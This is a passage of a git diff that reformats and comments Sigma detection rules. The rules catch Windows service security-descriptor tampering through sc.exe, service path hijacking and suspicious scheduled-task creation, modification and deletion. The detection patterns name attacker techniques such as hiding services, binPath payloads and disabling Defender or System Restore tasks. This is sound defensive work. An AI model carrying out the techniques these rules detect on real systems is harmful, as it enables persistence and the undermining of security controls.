dokan1" level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml index cd08f13c8..34f69b70c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml @@ -1,12 +1,10 @@ title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE id: 6c8fbee5-dee8-49bc-851d-c3142d02aa47 related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering + type: similar status: test -description: Detects suspicious DACL modifications to allow access to a service from - a suspicious trustee. This can be used to override access restrictions set by - previous ACLs. +description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. references: - https://twitter.com/0gtweet/status/1628720819537936386 - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -24,19 +22,19 @@ detection: EventID: 4688 Channel: Security selection_sc: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - A; + - A; # Allow Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml index 78b5e5133..f38e2db6b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml @@ -1,13 +1,12 @@ title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 related: - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detects suspicious DACL modifications to deny access to a service that - affects critical trustees. This can be used to hide services or make them unstoppable. +description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -26,19 +25,19 @@ detection: EventID: 4688 Channel: Security selection_sc: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - D; + - D; # Deny Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml index fe84a383f..3af159bf9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml @@ -1,13 +1,12 @@ title: Service DACL Abuse To Hide Services Via Sc.EXE id: a537cfc3-4297-4789-92b5-345bfd845ad0 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar status: test -description: Detects usage of the "sc.exe" utility adding a new service with special - permission seen used by threat actors which makes the service hidden and unremovable. +description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -29,11 +28,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - sdset + # Summary of permissions + # DC: Delete All Child Objects + # LC: List Contents + # WP: Write All Properties + # DT: Delete Subtree + # SD: Delete - DCLCWPDTSD condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml index 9253a0f75..634ae114b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_sdset_modification.yml @@ -1,13 +1,12 @@ title: Service Security Descriptor Tampering Via Sc.EXE id: 98c5aeef-32d5-492f-b174-64a691896d25 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detection of sc.exe utility adding a new service with special permission - which hides that service. +description: Detection of sc.exe utility adding a new service with special permission which hides that service. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -29,10 +28,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: sdset + CommandLine|contains: sdset condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml b/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml index 47dc358a3..a837897df 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_service_path_modification.yml @@ -1,8 +1,7 @@ title: Suspicious Service Path Modification id: 138d3531-8793-4f50-a2cd-f291b2863d78 status: test -description: Detects service path modification via the "sc" binary to a suspicious - command or path +description: Detects service path modification via the "sc" binary to a suspicious command or path references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - 'cmd ' - mshta @@ -39,13 +39,14 @@ detection: - cmd /c - cmd /k - cmd /r + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - C:\Windows\TEMP\ - \AppData\Local\Temp - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml index a553c9910..02874ed69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml @@ -1,9 +1,7 @@ title: Potential Persistence Attempt Via Existing Service Tampering id: 38879043-7e1e-47a9-8d46-6bec88e201df status: test -description: Detects the modification of an existing service in order to execute an - arbitrary payload when the service is started or killed as a potential method - for persistence. +description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. references: - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ author: Sreeman @@ -21,25 +19,25 @@ detection: EventID: 4688 Channel: Security selection_sc: - - CommandLine|contains|all: - - 'sc ' - - 'config ' - - binpath= - - CommandLine|contains|all: - - 'sc ' - - failure - - command= + - CommandLine|contains|all: + - 'sc ' + - 'config ' + - binpath= + - CommandLine|contains|all: + - 'sc ' + - failure + - command= selection_reg_img: - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - FailureCommand - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - ImagePath + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - FailureCommand + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - ImagePath selection_reg_ext: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml index 8f59cd865..922f86ec2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via Sc.EXE id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -18,20 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: sc.exe - - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' filter_kaspersky: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - SubjectUserName|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml index 03ecc2120..8b620626d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_appdata_local_system.yml @@ -20,22 +20,23 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /Create - /RU - /TR - C:\Users\ - \AppData\Local\ - CommandLine|contains: - - NT AUT - - ' SYSTEM ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space + NewProcessName|endswith: \schtasks.exe filter: - CommandLine|contains: /TN TVInstallRestore + # FP from test set in SIGMA + CommandLine|contains: /TN TVInstallRestore ParentProcessName|contains|all: - \AppData\Local\Temp\ - TeamViewer_.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml index b7c4947be..086b74a09 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_change.yml @@ -1,18 +1,13 @@ title: Suspicious Modification Of Scheduled Tasks id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b related: - - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 - type: similar + - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog + type: similar status: test -description: 'Detects when an attacker tries to modify an already existing scheduled - tasks to run from a suspicious location - - Attackers can create a simple looking task in order to avoid detection on creation - as it''s often the most focused on - +description: | + Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location + Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload - - ' references: - Internal Research - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -30,12 +25,12 @@ detection: EventID: 4688 Channel: Security selection_schtasks: - CommandLine|contains|all: + CommandLine|contains|all: - ' /Change ' - ' /TN ' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp - \AppData\Roaming\ - \Users\Public\ @@ -50,7 +45,7 @@ detection: - '%comspec%' - '%localappdata%' selection_susp_images: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - 'cmd /c ' diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml index 16de84725..5a5fe2b2a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: ' /create ' + NewProcessName|endswith: \schtasks.exe filter: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml index 60deb5516..8c0d79136 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Creation Involving Temp Folder id: 39019a4e-317f-4ce3-ae63-309a8c6b53c5 status: test -description: Detects the creation of scheduled tasks that involves a temporary folder - and runs only once +description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 author: Florian Roth (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /create ' - ' /sc once ' - \Temp\ - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml index dfc3ec3da..be9b46d45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete.yml @@ -1,13 +1,12 @@ title: Delete Important Scheduled Task id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 related: - - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by deleting their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -23,10 +22,11 @@ detection: EventID: 4688 Channel: Security schtasks_exe: - CommandLine|contains|all: + CommandLine|contains|all: - /delete - /tn - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker @@ -34,7 +34,7 @@ detection: - \Windows\WindowsUpdate\ - \Windows\UpdateOrchestrator\ - \Windows\ExploitGuard - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (all of schtasks_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml index 9da2a9bed..2980d58e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_delete_all.yml @@ -1,9 +1,7 @@ title: Delete All Scheduled Tasks id: 220457c1-1c9f-4c2e-afe6-9598926222c1 status: test -description: Detects the usage of schtasks with the delete flag and the asterisk symbol - to delete all tasks from the schedule of the local computer, including tasks scheduled - by other users. +description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /delete ' - /tn \* - ' /f' - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml index 9acedbd86..cff0d0edf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_disable.yml @@ -1,11 +1,10 @@ title: Disable Important Scheduled Task id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 related: - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by disabling their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task - https://twitter.com/MichalKoczwara/status/1553634816016498688 @@ -24,11 +23,12 @@ detection: EventID: 4688 Channel: Security schtasks_exe: - CommandLine|contains|all: + CommandLine|contains|all: - /Change - /TN - /disable - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker @@ -36,7 +36,7 @@ detection: - \Windows\WindowsUpdate\ - \Windows\UpdateOrchestrator\ - \Windows\ExploitGuard - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and (all of schtasks_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml index 9604e7926..f2275fdef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_env_folder.yml @@ -1,11 +1,10 @@ title: Suspicious Schtasks From Env Var Folder id: 81325ce1-be01-4250-944f-b4789644556f related: - - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 - type: derived + - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline + type: derived status: experimental -description: Detects Schtask creations that point to a suspicious folder or an environment - variable often used by malware +description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware references: - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection1_create: - CommandLine|contains: ' /create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: ' /create ' + NewProcessName|endswith: \schtasks.exe selection1_all_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \AppData\Local\ @@ -37,43 +36,42 @@ detection: selection2_parent: ParentCommandLine|endswith: \svchost.exe -k netsvcs -p -s Schedule selection2_some_folders: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\Windows\Temp - \Users\Public - '%Public%' filter_mixed: - - CommandLine|contains: - - update_task.xml - - /Create /TN TVInstallRestore /TR - - ParentCommandLine|contains: unattended.ini + - CommandLine|contains: + - update_task.xml + - /Create /TN TVInstallRestore /TR + - ParentCommandLine|contains: unattended.ini filter_avira_install: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /Xml "C:\Users\ - \AppData\Local\Temp\.CR. - Avira_Security_Installation.xml filter_avira_other: - CommandLine|contains|all: + # Comment out this filter if you dont use AVIRA + CommandLine|contains|all: - /Create /F /TN - '/Xml ' - \AppData\Local\Temp\is- - Avira_ - CommandLine|contains: + CommandLine|contains: - .tmp\UpdateFallbackTask.xml - .tmp\WatchdogServiceControlManagerTimeout.xml - .tmp\SystrayAutostart.xml - .tmp\MaintenanceTask.xml filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Temp\ - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml - condition: process_creation and (( all of selection1* or all of selection2* ) - and not 1 of filter*) + condition: process_creation and (( all of selection1* or all of selection2* ) and not 1 of filter*) falsepositives: - - Benign scheduled tasks creations or executions that happen often during software - installations - - Software that uses the AppData folder and scheduled tasks to update the software - in the AppData folders + - Benign scheduled tasks creations or executions that happen often during software installations + - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml index 0f002b517..26beefb2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_folder_combos.yml @@ -1,8 +1,7 @@ title: Schtasks From Suspicious Folders id: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb status: test -description: Detects scheduled task creations that have suspicious action command - and folder combinations +description: Detects scheduled task creations that have suspicious action command and folder combinations references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical author: Florian Roth (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_create: - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' selection_command: - CommandLine|contains: + CommandLine|contains: - powershell - pwsh - 'cmd /c ' @@ -34,7 +33,7 @@ detection: - 'cmd.exe /k ' - 'cmd.exe /r ' selection_all_folders: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - '%ProgramData%' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml index f46aca197..e46bea189 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_guid_task_name.yml @@ -18,17 +18,19 @@ detection: EventID: 4688 Channel: Security selection_img: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe selection_tn: - CommandLine|contains: + CommandLine|contains: + # Can start with single or double quote - /TN "{ - /TN '{ - /TN { selection_end: - CommandLine|contains: + CommandLine|contains: + # Ending of the name to avoid possible FP in the rest of the commandline - '}"' - - '}''' + - "}'" - '} ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml index 59713e66b..d9bb39e95 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml @@ -1,8 +1,7 @@ title: Uncommon One Time Only Scheduled Task At 00:00 id: 970823b7-273b-460a-8afc-3a6811998529 status: test -description: Detects scheduled task creation events that include suspicious actions, - and is run once at 00:00 +description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: pH-T (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|contains: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - wscript - vbscript - cscript @@ -34,7 +33,7 @@ detection: - powershell - \AppData\ selection_time: - CommandLine|contains|all: + CommandLine|contains|all: - once - 00:00 condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml index 2a00acfc8..73d50ad0a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_parent.yml @@ -1,8 +1,7 @@ title: Suspicious Add Scheduled Task Parent id: 9494479d-d994-40bf-a8b1-eea890237021 status: test -description: Detects suspicious scheduled task creations from a parent stored in a - temporary folder +description: Detects suspicious scheduled task creations from a parent stored in a temporary folder references: - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ author: Florian Roth (Nextron Systems) @@ -19,20 +18,19 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '/Create ' - NewProcessName|endswith: \schtasks.exe + CommandLine|contains: '/Create ' + NewProcessName|endswith: \schtasks.exe ParentProcessName|contains: - \AppData\Local\ - \AppData\Roaming\ - \Temporary Internet - \Users\Public\ filter: - CommandLine|contains: + CommandLine|contains: - update_task.xml - unattended.ini condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Software installers that run from temporary folders and also install scheduled - tasks + - Software installers that run from temporary folders and also install scheduled tasks level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml index 777f9a209..7cff053f7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml @@ -1,16 +1,12 @@ title: Potential Persistence Via Microsoft Compatibility Appraiser id: f548a603-c9f2-4c89-b511-b089f7e94549 related: - - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 - type: derived + - id: 73a883d0-0348-4be4-a8d8-51031c2564f8 + type: derived status: test -description: 'Detects manual execution of the "Microsoft Compatibility Appraiser" - task via schtasks. - - In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" - registry key. - - ' +description: | + Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. + In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman @@ -27,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'run ' - \Application Experience\Microsoft Compatibility Appraiser condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml index 3ea26bf51..28d7c1b8d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml +++ b/sigma/builtin/process_creation/proc_creation_win_schtasks_reg_loader.yml @@ -1,11 +1,10 @@ title: Scheduled Task Executing Payload from Registry id: 86588b36-c6d3-465f-9cee-8f9093e07798 related: - - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 - type: derived + - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 + type: derived status: experimental -description: Detects the creation of a schtasks that potentially executes a payload - stored in the Windows Registry using PowerShell. +description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: X__Junior 